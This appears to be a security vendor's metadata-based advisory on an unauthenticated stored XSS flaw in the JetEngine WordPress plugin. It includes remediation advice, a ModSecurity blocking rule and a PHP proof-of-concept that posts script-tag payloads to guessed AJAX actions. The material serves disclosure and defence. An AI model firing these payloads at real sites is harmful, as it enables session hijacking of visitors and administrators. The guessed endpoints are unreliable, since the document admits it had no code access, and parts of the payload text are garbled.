Atomic Edge analysis of CVE-2026-54188 (metadata-based): This vulnerability affects the JetEngine plugin for WordPress, versions up to and including 3.8.10. It is an unauthenticated Stored Cross-Site Scripting (XSS) vulnerability with a CVSS score of 7.2. The vulnerability allows attackers to inject arbitrary web scripts that execute when users access injected pages.
The root cause is insufficient input sanitization and output escaping. Atomic Edge analysis infers this from the CWE-79 classification and the vulnerability description. The plugin likely fails to sanitize user-supplied input before storing it in the database. It also likely fails to escape output when rendering that stored data on pages. Without code access, these conclusions remain inferred rather than confirmed. The most probable vulnerable components are JetEngine’s custom field handlers, dynamic content tags, or AJAX endpoints that process submissions from unauthenticated users.
To exploit this vulnerability, an attacker would target an unauthenticated submission endpoint within JetEngine. Common vectors include AJAX actions like `jet_engine_save_form` or `jet_engine_submit_post`. The attacker sends a POST request to `/wp-admin/admin-ajax.php` with the action parameter and a payload parameter containing malicious JavaScript. The payload might look like: `alert(document.cookie)` or an event handler such as `
`. The plugin stores this unsanitized input, and the script executes whenever an administrator or user views the affected page. Atomic Edge analysis suggests the attack requires no authentication and no nonce validation based on the ‘unauthenticated’ classification in the description.
Remediation requires implementing proper input sanitization and output escaping throughout the plugin. For stored input, the plugin should use WordPress functions like `sanitize_text_field()`, `sanitize_html_class()`, or `wp_kses()` depending on the context. When outputting stored data, the plugin must use `esc_html()`, `esc_attr()`, `esc_url()`, or `wp_kses_post()` appropriately. The patched version 3.8.10.1 likely applies these escaping and sanitization functions to all relevant user-supplied input fields.
The impact of successful exploitation includes full compromise of user sessions. An attacker can steal cookies, capture keystrokes, redirect users to malicious sites, or perform actions impersonating the victim. Since the vulnerability requires no authentication, any visitor to the WordPress site can be targeted. Stored XSS can lead to privilege escalation if an administrator views the injected page, potentially allowing the attacker to create admin accounts or install malicious plugins.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-54188 (metadata-based)
# Blocks unauthenticated stored XSS via JetEngine AJAX endpoints
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20261988,phase:2,deny,status:403,chain,msg:'CVE-2026-54188 - JetEngine Stored XSS via AJAX',severity:'CRITICAL',tag:'CVE-2026-54188'"
SecRule ARGS_POST:action "@rx ^jet_engine_" "chain"
SecRule ARGS_POST:fields "@rx <script[^>]*>.*</script>" "t:urlDecode"
# Alternative rule for direct form submission endpoints
SecRule REQUEST_URI "@contains /wp-json/jet-engine/"
"id:20261989,phase:2,deny,status:403,chain,msg:'CVE-2026-54188 - JetEngine Stored XSS via REST API',severity:'CRITICAL',tag:'CVE-2026-54188'"
SecRule REQUEST_METHOD "@streq POST" "chain"
SecRule REQUEST_BODY "@rx <script[^>]*>.*</script>" "t:urlDecode"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-54188 - JetEngine <= 3.8.10 - Unauthenticated Stored Cross-Site Scripting
$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress URL
// Test payload: a simple XSS that demonstrates stored execution
$xss_payload = '<script>alert("XSS_ATOMIC_EDGE_CVE_2026_54188");</script>';
// Possible AJAX actions for JetEngine that accept unauthenticated input
$possible_actions = array(
'jet_engine_save_form',
'jet_engine_submit_post',
'jet_engine_booking',
'jet_engine_ajax_handlers'
);
echo "[+] Testing CVE-2026-54188 against: $target_urln";
echo "[+] Payload: $xss_payloadnn";
foreach ($possible_actions as $action) {
$url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = array(
'action' => $action,
'nonce' => 'injected', // Potentially bypassed
'fields' => array(
'name' => 'test',
'value' => $xss_payload
)
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "[+] Action: $action - HTTP Code: $http_coden";
if ($http_code == 200) {
echo "[!] Possible successful injection. Check admin panel for script execution.n";
}
}
echo "n[+] Manual verification needed: Navigate to a page that displays stored data from JetEngine forms.n";
echo "[+] The XSS should execute showing 'XSS_ATOMIC_EDGE_CVE_2026_54188' in an alert box.n";
